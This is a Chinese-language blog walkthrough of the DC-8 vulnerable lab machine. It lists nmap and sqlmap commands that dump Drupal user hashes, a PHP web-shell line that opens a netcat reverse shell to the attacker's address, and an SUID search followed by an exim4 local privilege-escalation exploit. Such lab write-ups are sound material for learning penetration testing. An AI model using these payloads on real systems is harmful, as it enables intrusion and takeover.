• DC8


    DC-8

    信息收集

    nmap -T4 -A -p 1-65535 192.168.211.140

    又是Drupal

    发现有nid这个参数看看能不能sql注入

    web打点

    sql注入

    sqlmap -u "http://192.168.211.140/?nid=2" --dbs

    sqlmap -u "http://192.168.211.140/?nid=2" -D d7db --tables

    sqlmap -u "http://192.168.211.140/?nid=2" -D d7db -T users --columns

    sqlmap -u "http://192.168.211.140/?nid=2" -D d7db -T users -C name --dump

    admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
    john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
    

    写shell,读文件权限都不够,直接拿去解密了

    成功登陆

    反弹shell

    在此路径下找到可以写shell的地方,写入

    <?php system("nc -e /bin/bash 192.168.211.131 6666");?>

    填写表单,发送

    python -c 'import pty;pty.spawn("/bin/bash")'

    成功反弹shell

    提权

    SUID提权

    find / -perm -u=s -type f 2>/dev/null

    发现exim4,searchspolit

    下载/usr/share/exploitdb/exploits/linux/local/46996.sh

    启动http server

    wget下载

    这里很奇怪的一点,使用python启动交互式shell反而执行失败,直接执行成功

    chmod 777 exp.sh
    ./exp.sh -m setuid
    ./exp.sh -m netcat
    

    获取flag

  • 相关阅读:
    《java技术》第三次作业
    《Java技术》第二次作业
    《java技术》第一次作业
    java3
    java2
    java1
    开闭原则
    迪米特原则
    接口隔离原则
    里氏替换原则
  • 原文地址:https://www.cnblogs.com/karsa/p/15859521.html
Copyright © 2020-2023  润新知